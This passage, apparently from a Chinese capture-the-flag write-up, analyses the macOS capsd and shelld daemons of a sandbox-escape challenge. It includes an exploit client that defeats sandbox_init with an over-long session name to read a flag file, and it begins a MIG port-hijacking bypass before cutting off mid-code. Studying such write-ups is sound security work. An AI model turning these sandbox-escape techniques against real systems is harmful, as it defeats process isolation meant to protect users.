    if (!reply)
        return;

    int action = xpc_dictionary_get_uint64(msg, "action");

    if (action == ACTION_GRANT_CAPABILITY) {
        audit_token_t creds;
        // TODO check xpc_dictionary_set_audit_token
        xpc_dictionary_get_audit_token(msg, &creds);
        pid_t target = xpc_dictionary_get_int64(msg, "pid");
        const char* operation = xpc_dictionary_get_string(msg, "operation");
        const char* argument = xpc_dictionary_get_string(msg, "argument");

        if (operation && argument) {
            xpc_dictionary_set_bool(reply, "success", grant_capability_internal(creds, target, operation, argument) == KERN_SUCCESS);
        } else {
            xpc_dictionary_set_bool(reply, "success", false);
        }
    } else if (action == ACTION_HAS_CAPABILITY) {
        pid_t target = xpc_dictionary_get_int64(msg, "pid");
        const char* operation = xpc_dictionary_get_string(msg, "operation");
        const char* argument = xpc_dictionary_get_string(msg, "argument");
        xpc_dictionary_set_bool(reply, "success", has_capability_internal(target, operation, argument));
    } else {
        xpc_dictionary_set_bool(reply, "success", false);
    }

    xpc_connection_send_message(connection, reply);
} else {
    if (xpc_get_type(msg) != XPC_TYPE_ERROR || msg != XPC_ERROR_CONNECTION_INVALID) {
        char* description = xpc_copy_description(msg);
        os_log(OS_LOG_DEFAULT, "Received unexpected event on connection: %{public}s\n", description);
        free(description);
    }
}

handler 会根据传入的 xpc 请求来进行不同的操作：获取权限或查看当前是否有权限。

这里记录下 handler 调用的两个函数：grant_capability_internal 和 has_capability_internal。

2) has/grand_capability 函数

has_capability 和 grand_capability 函数没有在 capsd.c 中直接调用，它们是先前声明的 MIG 远程调用接口的实现。

可以看到，最终这两个函数也是调用上面刚刚提到的 *_internal 函数，因此实际上 capsd 中的 mach server 和 xpc service 最终提供给 client 的接口都是这两个接口，一模一样。

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return grant_capability_internal(token, target, op, arg);
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = has_capability_internal(pid, op, arg);
    return KERN_SUCCESS;
}

3) get_or_create_capabilities_for_pid 函数

该函数是两个 internal 函数的辅助函数。还记得先前提到的一个在 main 函数进行初始化的字典类型全局变量 capabilities_by_pid 么？这里将会对它进行查询或添加操作。

这个函数代码很短，先把代码贴出来：

CFMutableDictionaryRef get_or_create_capabilities_for_pid(pid_t pid) {
    // Check if the process exists. This is racy though...
    if (kill(pid, 0) != 0 && errno == ESRCH) {
        return NULL;
    }
    // 创建一个 CFNumber 类型的 key 值引用，且该值初始化为传入的 pid
    CFNumberRef key = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pid);
    // 创建一个 CF 字典类型的引用，注意这只是一个引用
    CFMutableDictionaryRef capabilities;
    /* 判断：这个 key 值是否已经在 capabilities_by_pid 字典中了（即先前是否已经添加过该 pid 了）
       如果存在，则将该 key 值所对应的 value （也是一个字典类型的值）的引用存入 capabilities 变量中 */
    if (!CFDictionaryGetValueIfPresent(capabilities_by_pid, key, (const void**)&capabilities)) {
        // 如果发现该 pid 不存在与全局字典中，则手动建立一个 value
        capabilities = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
        // 并将该 key value 键值对存入全局字典里
        CFDictionaryAddValue(capabilities_by_pid, key, capabilities);
        CFRelease(capabilities);
        // 这里稍微有点难懂，不过整体的意思是，注册一个 handler，当子进程退出时，自动释放那些存入的键值对
        dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
        dispatch_source_set_event_handler(source, ^{
            os_log(OS_LOG_DEFAULT, "cleaning up capabilities for dead client %d", pid);

            CFDictionaryRemoveValue(capabilities_by_pid, key);

            CFRelease(key);

            dispatch_source_cancel(source);
            dispatch_release(source);
        });
        dispatch_resume(source);
    } else {
        // 如果有，则无事发生，将取出来对应于该 pid 的 capabilities 字典返回给调用者
        CFRelease(key);
    }
    // 总而言之，这里一定会返回一个全局字典中对应于传入 key 值的一个 value 字典
    return capabilities;
}

初始时，该函数将判断传入的 pid 所在进程是否仍然存活。如果目标进程已经死亡，则没意义再创建一个 capability 字典了。

向某个进程发送 0 号信号时，不会发送任何信号，但是会进行错误检查。
这里的 ESRCH 是 进程不存在的错误代码。如果指定 pid 不存在则 kill -0 将会返回 ESRCH。

如果存活，则判断全局字典中是否存在目标 pid 的键值对。如果存在则将其 value 引用返回给调用者，否则新建一个**(pid, capabilities)键值对**，并将其插入至全局字典中，最后返回 value 的引用。

4) grant_capability_internal 函数

grant_capability_internal 函数应该算是整个 capsd 的核心函数，不过代码也很短：

kern_return_t grant_capability_internal(audit_token_t token, pid_t target, const char* op, const char* arg) {
    // 向 sandbox 请求 token 所对应进程中，指定 op 和 arg 所请求的权限
    if (sandbox_check_by_audit_token(token, op, SANDBOX_CHECK_NO_REPORT, arg, NULL, NULL, NULL) == 0) {
        // 权限请求成功，则获取或创建一个对应于传入 pid 的 capabilities 字典
        CFMutableDictionaryRef capabilities = get_or_create_capabilities_for_pid(target);
        if (!capabilities)
            return KERN_FAILURE;
        // 将传入的 op 和 arg 全转换成 CFStringRef 形式
        CFStringRef operation = CFStringCreateWithCString(kCFAllocatorDefault, op, kCFStringEncodingASCII);
        CFStringRef argument = CFStringCreateWithCString(kCFAllocatorDefault, arg, kCFStringEncodingASCII);
        // 尝试获取 capabilities 中，键 operation 对应的值 arguments 集合
        CFMutableSetRef arguments;
        if (!CFDictionaryGetValueIfPresent(capabilities, operation, (const void**)&arguments)) {
            // 如果没有，则新建一个 arguments 集合，并将其插入进 capabilities中
            arguments = CFSetCreateMutable(kCFAllocatorDefault, 0, &kCFTypeSetCallBacks);
            CFDictionaryAddValue(capabilities, operation, arguments);
            CFRelease(arguments);
        }
        // 将新的 arguments 插入进 capabilities 里 operation 键所对应的 arguments 集合中
        CFSetSetValue(arguments, argument);

        CFRelease(operation);
        CFRelease(argument);
        return KERN_SUCCESS;
    } else {
        return KERN_FAILURE;
    }
}

在这里，我们已经可以理清所有使用到的数据结构：

Server 接收到的 XPC 消息结构

{
    "action" : ACTION_GRANT_CAPABILITY / ACTION_HAS_CAPABILITY,
    "operation" : "str type operation",
    "argument" : "str type argument"
}

Server 返回的信息结构
1
2
3
{
"success" : 0/1
}

全局字典 capabilities_by_pid 结构：

{
    pid_1 : [
        operation_1 : [
          argument_1，
          argument_2，
          ...
      ],
      operation_2 : [
          argument_1，
          argument_2，
          ...
      ],
      ...
    ],
    pid_2 : [
        operation_1 : [
          argument_1，
          argument_2，
          ...
      ],
      operation_2 : [
          argument_1，
          argument_2，
          ...
      ],
      ...
    ],
    ...
}

不过这不是重点。注意到 sandbox_check_by_audit_token 函数的第一个参数 token 是由 grant_capability_internal 函数传入的：

kern_return_t grant_capability_internal(audit_token_t token, pid_t target, const char* op, const char* arg) {
    if (sandbox_check_by_audit_token(token, op, SANDBOX_CHECK_NO_REPORT, arg, NULL, NULL, NULL) == 0) {
        ...
    }
    ...
}

而 grant_capability_internal 函数的第一个参数，是直接与信息发送方挂钩：

audit_token_t creds;
// TODO check xpc_dictionary_set_audit_token
xpc_dictionary_get_audit_token(msg, &creds);
...

if (...) {
    xpc_dictionary_set_bool(reply, "success", grant_capability_internal(creds, ...) == KERN_SUCCESS);
} 
...

因此，传入 grant_capability_internal 函数的 pid，只是起到了一个键的作用，真正用于判断 sandbox 的则是 audit token。正常情况下消息发送者的 pid 理应和发送请求中的 pid 相同（即发送者应该发送自己的 PID 给 service）。

最后再说明一下sandbox_check_by_audit_token 函数，这个函数几乎没有任何说明文档可供查阅：

作用：检查某些操作是否允许在沙箱返回内执行，如果允许则返回 0，即 DECISION_ALLOW。

函数定义：

1 2	extern int SANDBOX_CHECK_NO_REPORT; int sandbox_check_by_audit_token(audit_token_t token, const char* operation, int flags, ...);

函数参数：
- 通常 flags 为 SANDBOX_CHECK_NO_REPORT，这表示以静默方式检查沙箱权限，不输出任何信息

operation 指向一个 沙箱权限规则字符串（类似scheme的语言，因此 scheme 语法很有用），我们可以在 OSX Sandbox Rule Set 中获得更多有用的沙箱权限规则描述示例。

flags 后面 var_args 参数中的内容与 operation相关，例如：

// mach-lookup com.apple....
int port_denied = sandbox_check(pid, "mach-lookup", SANDBOX_CHECK_NO_REPORT, "com.apple....");
  
// file-read-data path/to/file
int read_denied = sandbox_check(pid, "file-read-data", SANDBOX_CHECK_NO_REPORT, "path/to/file");

c. client.c

client 执行的操作很简单，此处略过说明：

int main(int argc, const char *argv[]) {
    // 与 capsd 建立 xpc 连接
    xpc_connection_t connection = xpc_connection_create_mach_service("net.saelo.capsd.xpc", NULL, 0);
    xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {
    });
    xpc_connection_resume(connection);

    pid_t pid;
    puts("Enter pid:");
    scanf("%d", &pid);

    printf("Adding capability 'process-exec*' for resource '/bin/bash' to process %d\n", pid);
    // 创建 XPC 消息字典
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_uint64(msg, "action", ACTION_GRANT_CAPABILITY);
    xpc_dictionary_set_int64(msg, "pid", pid);
    xpc_dictionary_set_string(msg, "operation", "process-exec*");
    xpc_dictionary_set_string(msg, "argument", "/bin/bash");
    // 发送并等待 server 的返回信息
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, msg);
    // 将返回信息输出
    char* description = xpc_copy_description(reply);
    printf("Reply: %s\n", description);

    return 0;
}

运行效果：

d. 功能

综合上面的代码，我们可以了解到，capsd 对 mach IPC 和 XPC 都提供了两个接口 grand_capability 和 has_capability。

其中， grand_capability 函数会判断消息发送方请求的沙箱权限是否被允许，如果是，则将其添加进全局字典中。

grand 操作就指的是将请求的 op 和 args 添加进全局字典的这个操作，而并非实际分配了一个新权限。

若下一次有请求判断某个 pid 是否有特定的沙箱权限时（has_capability），capsd 只会检查全局字典中是否有先前所保存的 op 和 args，并根据检查结果返回。

接下来我们再看看 shelld。

2. shelld

a. shelld.defs

这里定义了4个接口，分别是 shelld_create_session 、 shell_exec、register_completion_listener 和 unregister_completion_listener。接口具体用法后面再说，干看 defs 也看不出来。

subsystem shelld 133700;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:4096];

routine shelld_create_session(server: mach_port_t; name: string; ServerAuditToken token: audit_token_t);
routine shell_exec(server: mach_port_t; session: string; command: string; ServerAuditToken token: audit_token_t);
routine register_completion_listener(server: mach_port_t; session: string; listener: mach_port_t; ServerAuditToken token: audit_token_t);
routine unregister_completion_listener(server: mach_port_t; session: string; ServerAuditToken token: audit_token_t);

b. shelld_client.defs

定义了接口 shelld_client_notify，目测可能是 Server 用于通知 Client 的。

subsystem shelld_client 133800;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:4096];

routine shelld_client_notify(listener: mach_port_t; status: int; output: string);

c. shelld.c

1) shelld main 函数

main 函数做了以下几件事情：

创建了一个全局字典 sessions。
创建一个权限为 rwxrwxrwx 的文件夹 /private/tmp/shelld。
从 bootstrap 中获取到 capsd 所注册的 mach port，同时将自己的 mach port 注册进 bootstrap 中。
为自己的 mach port 设置 MIG 的处理例程。

int main(int argc, const char *argv[]) {
    kern_return_t kr;
    mach_port_t bootstrap_port, service_port;

    sessions = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);

    mkdir("/private/tmp/shelld", 0777);

    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bootstrap_port);

    kr = bootstrap_look_up(bootstrap_port, "net.saelo.capsd", &capsd_service_port);
    ASSERT_KERN_SUCCESS(kr, "bootstrap_look_up");

    kr = bootstrap_check_in(bootstrap_port, "net.saelo.shelld", &service_port);
    ASSERT_KERN_SUCCESS(kr, "bootstrap_check_in");

    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_server);
    });

    dispatch_resume(source);
    dispatch_main();
    exit(-1);
}

2) register_completion_listener 函数

该函数的作用比较简单，初始时将 sessions 全局字典中找出符合 session_name 和 client 的字典，并将传入的 listener 的 mach port 存入进去。

kern_return_t register_completion_listener(mach_port_t server, const char* session_name, mach_port_t listener, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session) {
        mach_port_deallocate(mach_task_self(), listener);
        return KERN_FAILURE;
    }

    CFNumberRef value = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &listener);
    CFDictionaryAddValue(session, CFSTR("listener"), value);
    CFRelease(value);

    return KERN_SUCCESS;
}

CFMutableDictionaryRef lookup_session(const char* name, audit_token_t client) {
    CFStringRef key = CFStringCreateWithCString(kCFAllocatorDefault, name, kCFStringEncodingASCII);

    CFMutableDictionaryRef session = NULL;
    if (CFDictionaryGetValueIfPresent(sessions, key, (const void**)&session)) {
        CFNumberRef cf_owner_pid = CFDictionaryGetValue(session, CFSTR("pid"));
        int owner_pid;
        ASSERT(CFNumberGetValue(cf_owner_pid, kCFNumberSInt32Type, &owner_pid));
        if (owner_pid != audit_token_to_pid(client))
            session = NULL;
    }

    CFRelease(key);

    return session;
}

此时可以暂时确定 sessions 字典的结构为：

{
    "session_name1" : {
        "pid1" : "xxx",
        "listener" : ""
    },
    [...]
}

3) unregister_completion_listener 函数

其行为与 register_completion_listener 相反，将 listener mach port 从 sessions 中移出。

kern_return_t unregister_completion_listener(mach_port_t server, const char* session_name, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session)
        return KERN_FAILURE;

    return remove_listener(session);
}

kern_return_t remove_listener(CFMutableDictionaryRef session) {
    CFNumberRef value;

    if (CFDictionaryGetValueIfPresent(session, CFSTR("listener"), (const void**)&value)) {
        mach_port_t listener;
        ASSERT(CFNumberGetValue(value, kCFNumberSInt32Type, &listener));
        mach_port_deallocate(mach_task_self(), listener);
        CFDictionaryRemoveValue(session, CFSTR("listener"));
        return KERN_SUCCESS;
    } else {
        return KERN_FAILURE;
    }
}

4) shelld_create_session 函数

该函数主要是在全局字典 sessions 中创建一些结构体，具体的操作以注释的形式写入代码中：

kern_return_t shelld_create_session(mach_port_t server, const char* session_name, audit_token_t client) {
    // 约束 session name 只能是字母或数字
    for (const char* ptr = session_name; *ptr; ptr++) {
        if (!isalnum(*ptr)) {
            os_log(OS_LOG_DEFAULT, "shelld: denying invalid session name: %s", session_name);
            return KERN_FAILURE;
        }
    }
    // 不能重复创建相同名称的 session
    CFStringRef key = CFStringCreateWithCString(kCFAllocatorDefault, session_name, kCFStringEncodingASCII);
    if (CFDictionaryContainsKey(sessions, key)) {
        os_log(OS_LOG_DEFAULT, "shelld: session already exists: %s", session_name);
        CFRelease(key);
        return KERN_FAILURE;
    }
    // 创建 session 字典，并将其添加进全局 sessions 中
    CFMutableDictionaryRef session = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    CFDictionaryAddValue(sessions, key, session);
    // 将 audit token 对应的 pid 放入 session 字典中
    pid_t pid = audit_token_to_pid(client);

    CFNumberRef cf_pid = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pid);
    CFDictionaryAddValue(session, CFSTR("pid"), cf_pid);
    CFRelease(cf_pid);
    // 为当前创建的 session 新建一个文件夹
    char workdir[1024];
    snprintf(workdir, sizeof(workdir), "/private/tmp/shelld/%s", session_name);
    mkdir(workdir, 0777);

    // Note: this is racy: the client could exit and spawn a priviliged process into its PID before the server
    // gets here... Not too easy to exploit though from inside the sandbox so should be fine for a CTF :)
    // 设置传入pid所对应进程结束时的清除操作
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        os_log(OS_LOG_DEFAULT, "shelld: cleaning up session for dead client %d", pid);

        remove_listener(session);
        CFDictionaryRemoveValue(sessions, key);

        // TODO unlink directory here as well

        CFRelease(session);
        CFRelease(key);

        dispatch_source_cancel(source);
        dispatch_release(source);
    });
    dispatch_resume(source);

    return KERN_SUCCESS;
}

5) shell_exec 函数

接下来的这个函数可谓是重头戏，需要好好说明一下。

初始时，shelld 会判断传入的 command 是否为空。这里的 command 将被接下来所创建的子进程所使用，使用效果为 system(command)，因此 command 不能为空。
1
2
if (!command || strlen(command) == 0)
return KERN_FAILURE;

接下来，判断信息发送者是否有权限执行 /bin/bash，因为子进程会调用 /bin/bash。

// 判断传入的 creds 是否有权限执行 /bin/bash
if (sandbox_check_with_capabilities(creds, "process-exec*", SANDBOX_CHECK_NO_REPORT, "/bin/bash")) {
    os_log(OS_LOG_DEFAULT, "shelld: denying request to sandboxed client %d\n", audit_token_to_pid(creds));
    return KERN_FAILURE;
}

其中的 sandbox_check_with_capabilities 函数的操作如下：

int sandbox_check_with_capabilities(audit_token_t creds, const char* operation, int flags, const char* arg) {
     // 如果发送方本来就可以执行这个操作
     int result = sandbox_check_by_audit_token(creds, operation, flags, arg);
     if (result != 1) {
         // 则直接返回0 ，表示允许执行
         return result;
     }
     // 如果发送方不支持执行这个操作，则向 capsd 询问发送方之前是否请求了这个权限
     int client_has_capability = 0;
     pid_t pid = audit_token_to_pid(creds);
     has_capability(capsd_service_port, pid, operation, arg, &client_has_capability);
     // 如果 capsd 中的权限存在，即 client_has_capability ，则整个函数返回0，表示允许执行操作
     return !client_has_capability;
}

之后，获取传入 session name 和 creds 所对应的 session，并创建一对管道。这对管道将用于重定向子进程的 stdout

// 获取当前 creds 所对应的 session
CFMutableDictionaryRef session = lookup_session(session_name, creds);
if (!session)
    return KERN_FAILURE;
// 创建一堆 rw pipe，这对 pipe 将用于重定向子进程的 stdout
int fds[2];
ASSERT(pipe(fds) == 0);

接下来便是创建子进程，我们看看子进程做了什么工作：

// 创建新进程
int pid = fork();
if (pid == 0) {
    // 在子进程中
    char* argv[] = {"/bin/bash", "-c", (char*)command, NULL};
    char* envp[] = {"PATH=/bin:/usr/bin:/usr/sbin", NULL};
    // 切换子进程的工作目录为先前创建的 session 文件夹
    char cwd[1024];
    snprintf(cwd, sizeof(cwd), "/private/tmp/shelld/%s", session_name);
    chdir(cwd);
    // 主动进入沙箱
    char profile[4096];
    snprintf(profile, sizeof(profile), sb_profile_template, session_name);
    sandbox_init(profile, 0, NULL);
    // 重定向 stdout
    dup2(fds[1], STDOUT_FILENO);
    close(STDERR_FILENO);
    close(STDIN_FILENO);

    close(fds[0]);
    close(fds[1]);
    // 执行 bash
    execve("/bin/bash", argv, envp);
    _exit(-1);
} else if (pid < 0) {
    return KERN_FAILURE;
}

可以看到，子进程先是切换了自己当前的工作目录，之后主动进入沙箱、重定向 stdout，并最终执行 bash 程序。

调用 sandbox_init 进入沙箱时，需要指定沙箱规则，我们看看子进程的沙箱规则模板是什么样的：

const char* sb_profile_template =   "(version 1)\n"
                                    "(deny default)\n"
                                    "(import \"system.sb\")\n"
                                    "(allow process-fork)\n"
                                    "(allow file-read* file-write* (subpath \"/private/tmp/shelld/%s\"))\n"
                                    "(allow file-read-data file-write-data (subpath \"/dev/tty\"))\n"
                                    "(allow file-read* process-exec (subpath \"/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/sbin/\"))\n";

这里配置了一些权限：

使用白名单设置
导入 /System/Library/Sandbox/Profiles/system.sb 中的系统权限，这之中允许了诸如读取 /dev/null、/dev/zero 文件等常用权限。
允许 fork
允许对该 session 工作路径下一切文件的任意信息的读写操作
这里的任意信息包括但不限于：文件数据、文件元数据、文件扩展属性等等。
即一个文件里所有能读的东西。
允许对 /dev/tty 路径下任意文件的数据读取和写入操作
允许对 /bin、/usr/bin、/usr/sbin 文件夹下任意文件的读取与执行

回到父进程，接下来父进程注册子进程退出时的事件处理例程

int rfd = fds[0];

__block int running = true;

// 注册进程退出时的清除事件
os_log(OS_LOG_DEFAULT, "shelld: bash spawned: %d\n", pid);
dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, dispatch_get_main_queue());
dispatch_source_set_event_handler(source, ^{
    running = false;
    handle_process_exited(pid, session, rfd);
    dispatch_source_cancel(source);
    dispatch_release(source);
});
dispatch_resume(source);

注意到处理例程内部调用的 handle_process_exited 函数：

void handle_process_exited(pid_t pid, CFMutableDictionaryRef session, int output_fileno) {
    int status;
    waitpid(pid, &status, 0);

    os_log(OS_LOG_DEFAULT, "shelld: child %d exited with status %d", pid, status);

    char output[4096];
    size_t nread = read(output_fileno, output, sizeof(output) - 1);
    output[nread] = 0;

    CFNumberRef value;
    if (CFDictionaryGetValueIfPresent(session, CFSTR("listener"), (const void**)&value)) {
        mach_port_t listener;
        ASSERT(CFNumberGetValue(value, kCFNumberSInt32Type, &listener));
        shelld_client_notify(listener, status, output);
    }

    close(output_fileno);
    CFRelease(session);
}

该函数会将子进程的 stdout 全部输出信息，读取 4096字节并将其发送给 listener port，即 client。

最后父进程注册子进程的超时处理例程，每个子进程最多运行 60s，若执行超时则会被立即 kill。

// 设置子进程超时时间为 60s
dispatch_after(dispatch_time(DISPATCH_TIME_NOW, 60 * NSEC_PER_SEC), dispatch_get_main_queue(), ^{
    if (!running)
        return;
    os_log(OS_LOG_DEFAULT, "shelld: killing process %d due to timeout", pid);
    kill(pid, SIGKILL);
});

d. client.c

示例代码 client 中所做的事情不多，具体说明内嵌进代码中。

kern_return_t shelld_client_notify(mach_port_t listener, int status, const char* output) {
    printf("Command finished with status %d and output: %s\n", status, output);
    return KERN_SUCCESS;
}

int main() {
    printf("PID: %d\n", getpid());
    puts("Press enter to continue...");
    getchar();

    // 获取 shelld 的mach port
    mach_port_t bp, sp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "bootstrap_look_up");

    // 创建一对收发信息的 listener 和 listener_send_right
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    // 在 shelld 中创建一个 session
    if (shelld_create_session(sp, "foo") != KERN_SUCCESS) {
        puts("Failed to create session");
        exit(-1);
    }
    // 将 listener_send_right 注册进 session 中的 listener
    register_completion_listener(sp, "foo", listener_send_right);
    mach_port_deallocate(mach_task_self(), listener_send_right);
        
    // 设置自动处理 server 端调用的 notify 接口
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_client_server);
    });
    dispatch_activate(source);

    // client 连续三次向 shelld 请求执行程序
    printf("%d\n", shell_exec(sp, "foo", "echo Hello World > bar"));
    printf("%d\n", shell_exec(sp, "foo", "cat bar"));
    printf("%d\n", shell_exec(sp, "foo", "cat bar"));

    dispatch_main();
    return 0;
}

运行结果：

e. 功能

通过阅读上面的代码，我们可以了解到，shelld 会根据信息发送方的权限与请求，动态创建一个带有沙箱的子进程。这里的权限指的是 capsd 中存储的 capabilities。

四、漏洞点

当前的 exploit 位于沙箱中，因此无法直接读取外部的 flag。我们只能通过题目提供的两个服务来尝试进行沙箱逃逸，通过观察我们可以发现，shelld 中有个 shell_exec 函数可以执行一个新的程序，或许可以尝试让 shelld 启动一个子进程来读取 flag。但这里存在一些条件：

shell_exec 中会先判断权限（即 capabilities），没有 "process-exec* "/bin/bash" 沙箱权限的请求者将无法让 shelld 启动新进程。很明显 Exploit 位于沙箱之中，沙箱规则没有提供这个权限，无法直接通过这个 check。
即便绕过了先前的权限判断，但 shell_exec 启动的子进程还会执行 sandbox_init 函数进入沙箱。一旦子进程进入沙箱，则子进程将无权读取 flag。

我们先从简单的入手。

1. sandbox_init 沙箱函数绕过

shell_exec 启动的子进程会执行 sandbox_init 函数，倘若该函数执行成功，那么子进程就无法读取到 flag。

那么，如何让 sandbox_init 函数执行失败呢？注意 sb_profile_template 字符串：

const char* sb_profile_template =   "(version 1)\n"
                                    "(deny default)\n"
                                    "(import \"system.sb\")\n"
                                    "(allow process-fork)\n"
                                    "(allow file-read* file-write* (subpath \"/private/tmp/shelld/%s\"))\n"
                                    "(allow file-read-data file-write-data (subpath \"/dev/tty\"))\n"
                                    "(allow file-read* process-exec (subpath \"/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/bin/\"))\n"
                                    "(allow file-read* process-exec (subpath \"/usr/sbin/\"))\n";

根据我的测试，scheme in AppSandboxProfile 的字符串长度不得超过 1023 字节。如果超过则 scheme profile 将解析出错，sandbox_init 函数直接返回，不会进入沙箱。

以下是测试结果：

因此，我们可以通过传入超长 session name 来绕过子进程的 sandbox 初始化操作，就像下面这个 client：

#include 
#include 
#include 

#include 
#include 

boolean_t shelld_client_server(
        mach_msg_header_t *InHeadP,
        mach_msg_header_t *OutHeadP);


kern_return_t shelld_client_notify(mach_port_t listener, int status, const char* output) {
    printf("Command finished with status %d and output: %s\n", status, output);
    return KERN_SUCCESS;
}

// ./client `python -c "print('a'*3)"`
int main(int argc, char* argv[]) {
    char* session_name = argv[1];
    printf("session_name: %s\n", session_name);

    mach_port_t bp, sp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "bootstrap_look_up");

    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    shelld_create_session(sp, session_name);

    register_completion_listener(sp, session_name, listener_send_right);
    mach_port_deallocate(mach_task_self(), listener_send_right);

    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, dispatch_get_main_queue());
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, shelld_client_server);
    });
    dispatch_activate(source);

    // 测试基本功能
    printf("%d\n", shell_exec(sp, session_name, "echo 'Hello World'"));
    // 尝试读取沙箱外部数据
    printf("%d\n", shell_exec(sp, session_name, "cat /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag"));

    dispatch_main();
    return 0;
}

运行结果如下：

可以看到当传入的 session name 超级长的时候，即可超过沙箱函数，读取到沙箱外部文件。

该问题成功解决。

2. Capabilities 权限检测绕过

这里算是整个题目的重点，稍微有点复杂。

a. 提出的设想

接下来我们需要绕过 sandbox_check_with_capabilities 检查。再贴一下它的代码：

int sandbox_check_with_capabilities(audit_token_t creds, const char* operation, int flags, const char* arg) {
    int result = sandbox_check_by_audit_token(creds, operation, flags, arg);
    if (result != 1) {
        return result;
    }

    int client_has_capability = 0;
    pid_t pid = audit_token_to_pid(creds);
    has_capability(capsd_service_port, pid, operation, arg, &client_has_capability);

    return !client_has_capability;
}

很明显，作为位于沙箱中的发送方，exploit 肯定没有权限执行 /bin/bash，因此 sandbox_check_by_audit_token 无论如何一定会返回 1。因此 shelld 将会向 capsd 进行第二次查询。

如果 capsd 中可以返回一个 has capability 的结果给 shelld，那么 exploit 就可以通过 sandbox check，从而 get flag。但正常情况下 exploit 无法通过 capsd 里 grand_capability 方法中的 sand_check_* 函数，因此 capsd 将不会返回一个我们所期望的结果给 shelld。

那如果我们能劫持这个 capsd_service_port ，自己伪造一个 “capsd” 向 shelld 发送伪造结果，那么就可以通过 shelld 的 sandbox check，进而 get flag。

那该如何伪造呢？这就涉及 MIG 所有权规则（MIG ownership rule）。

b. MIG 所有权规则

这里的所有权，指的是调用者以参数形式 传给 MIG 例程的 mach port的所有权。

之前在学习 Mach IPC 时，我们只是简单的了解了 MIG 传递基础类型的例子，并没有思考过传递复杂类型参数时的一些细节。

现在仔细想想，对于调用者传递一个 mach port 给 server 的情况，这个 mach port 的生命周期该如何管理呢？

这里，我们将以 shelld 中的 register_completion_listener 函数来作为一个例子，因为只有该函数会接收一个 mach port 类型的参数。

1) shelld_server

初始时，shelld 会指定 shell_server 函数来处理所有传入的 mach message。而 MIG shelld_server 函数的功能相当简单：做一些基础检查工作，之后根据接收到的 mach message 中的 msgh_id 字段，来动态选择调用哪个 routine 例程：

之前曾提到过，每个 mach message header 中有个字段 msgh_id，这个是可供用户自己使用的一个字段， MIG 使用该字段来区分client 想调用哪个 server 接口。

// shelldServer.c
mig_external boolean_t shelld_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
    register mig_routine_t routine;
    // 初始化待返回给 client 的 mach message 相关字段
    OutHeadP->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(InHeadP->msgh_bits), 0);
    OutHeadP->msgh_remote_port = InHeadP->msgh_reply_port;
    /* Minimal size: routine() will update it if different */
    OutHeadP->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);
    OutHeadP->msgh_local_port = MACH_PORT_NULL;
    OutHeadP->msgh_id = InHeadP->msgh_id + 100;
    OutHeadP->msgh_reserved = 0;
    // 判断 msg_id 是否有效，如果有效，则设置 msg_id 对应的 MIG 接口处理例程至 routine 函数指针中
